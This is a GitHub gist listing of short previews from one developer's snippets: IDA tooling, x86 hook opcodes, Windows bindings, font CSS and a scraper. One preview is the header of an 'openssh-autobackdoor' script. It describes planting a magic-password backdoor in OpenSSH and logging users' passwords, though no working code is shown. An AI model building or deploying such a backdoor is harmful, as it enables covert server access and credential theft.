
NyaMisty / riscv-processor-deva.py
Created July 9, 2017 05:37
Enhanced RISC-V Processor
# Development-only hook: as soon as this file is loaded, connect the current
# process to a PyDev remote debug server on localhost:15306 and forward
# stdout/stderr to that server.
# NOTE(review): this runs unconditionally at import time. Remove it or gate it
# behind an explicit opt-in before sharing the module: whatever is listening on
# that local port gets debugger control of the loading process (IDA, judging by
# the idaapi imports that follow). Behaviour when no server is listening is not
# visible here -- confirm.
import pydevd
pydevd.settrace('localhost', port=15306, stdoutToServer=True, stderrToServer=True)
from idaapi import *
from idc import *
import idautils
import copy
import ctypes
NyaMisty / gist:3bcfa09eaa900221803a1f603b486da1
Created July 31, 2017 14:34
Windows 10 14393 Store App Verify Elevated Call Stack
(launcher) ShellExecute...etc.
(launcher) IApplicationActivationManager::ActivateApplication::..
(ActXPrxy.dll) ====RPC====
(sihost.exe) twinui.appcore.dll::CApplicationActivationManager::..
(ActXPrxy.dll) ====RPC====
(sihost.exe) ActivationManager.dll::Execution::ActivationManagerShim::ActivateApplicationForProtocol
(sihost.exe) ActivationManager.dll::Execution::ActivationManagerShim::ActivateApplicationForContractByAcid
(sihost.exe) ActivationManager.dll::Execution::ActivationManagerShim::ActivateApplicationForContractByAcidAsUserWithHost
(sihost.exe) ActivationManager.dll::Execution::ActivationManagerShim::_ActivateApplicationForContractByAcid
(sihost.exe) twinui.appcore.dll::CApplicationActivationManager::ActivateApplicationForContractByAcidAsUserWithHost
NyaMisty / openssh-autobackdoor.bash
Last active October 15, 2017 04:09 — forked from system123/openssh-autobackdoor.bash
This script provides OpenSSH backdoor functionality with a magic password and logs passwords as well. It leverages the same basic idea behind common OpenSSH patches but this script attempts to make the process version agnostic. Use at your own risk.
#!/bin/bash
# ============================================
# satyr's openssh autobackdooring doohicky v0.-1
# ImpendingSatyr@gmail.com
# ============================================
# USAGE:
# Run this script with no args and it'll prompt for the "Magic" password and location to log passwords to (incoming and outgoing).
# If you give the location that passwords will be logged to as an arg, this script will try to automate almost everything
# (Like common openssh compiling problems, such as missing pam, kerberos, zlib, openssl-devel, etc.
# [it'll install them via apt or yum, whichever is available]).
NyaMisty / ldasm.py
Last active August 23, 2018 09:52
PyLdasm
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
NyaMisty / apihook.py
Last active August 23, 2018 10:01
Python APIHook
# Upper bound on the encoded length of a single x86 instruction, in bytes.
MAX_INSN_LEN = 15

# Addressing bytes that accompany MOV_OPCODE.
# ModRM 0x44: mod=01 (a 1-byte displacement follows), r/m=100 (a SIB byte follows).
MOV_MODRM_BYTE = 0x44
# SIB 0x24: no index register, base register rsp -> the destination is [rsp + disp8].
MOV_SIB_BYTE = 0x24

# One-byte x86 opcodes.
# NOTE(review): presumably these are emitted together when patching a function
# entry; how they are combined is not visible here -- confirm against the code
# that uses them.
RET_OPCODE = 0xC3   # near return
MOV_OPCODE = 0xC7   # MOV r/m, imm32
PUSH_OPCODE = 0x68  # PUSH imm32
JMP_OPCODE = 0xE9   # JMP rel32
NyaMisty / .css
Created October 11, 2018 15:04
Huakang Shaonv Font CSS.css
@font-face {
font-family: 'huakang_shaonv_for_powerline';
src: url(data:application/font-woff2;charset=utf-8;base64,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
/*! Generated by Font Squirrel (https://www.fontsquirrel.com) on January 5, 2019 */
@font-face {
font-family: 'huakang_shaonv_for_powerline_updated';
src: url(data:application/font-woff;charset=utf-8;base64,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
NyaMisty / iphlpapi.py
Created October 21, 2019 17:42
Python binding for GetIfTable2, GetIpInterfaceTable and GetAdaptersInfo
import ctypes
from ctypes import Structure, POINTER, c_char, c_void_p, c_ulong
from ctypes.wintypes import DWORD, UINT, BYTE, BOOL, ULONG, WCHAR, WORD, USHORT, BOOLEAN
from winerror import NO_ERROR, ERROR_INSUFFICIENT_BUFFER
from comtypes import GUID
# Windows integer typedefs that are not among the names imported from
# ctypes.wintypes in this file, aliased to the matching ctypes types so the
# structure definitions can use the Win32 spellings.
UCHAR = ctypes.c_ubyte          # unsigned 8-bit
ULONG64 = ctypes.c_uint64       # unsigned 64-bit, fixed width
ULONGLONG = ctypes.c_ulonglong  # unsigned long long
### Keybase proof
I hereby claim:
* I am nyamisty on github.
* I am nyamisty (https://keybase.io/nyamisty) on keybase.
* I have a public key ASD7LTpwNB5Z8nVVe7ulyhPeHBI9MzdkccnsRkhNGZuh2wo
To claim this, I am signing this object:
NyaMisty / add_nijisanji.py
Created July 27, 2020 04:26
NIJISANJI to vdb~
#coding: utf8
import sys
reload(sys)
sys.setdefaultencoding("UTF8")
import requests, re, json
sess = requests.Session()
r = sess.get("https://nijisanji.ichikara.co.jp/member/")
urls = re.findall(r"href=(https://nijisanji\.ichikara\.co\.jp/member/.*?)>", r.text)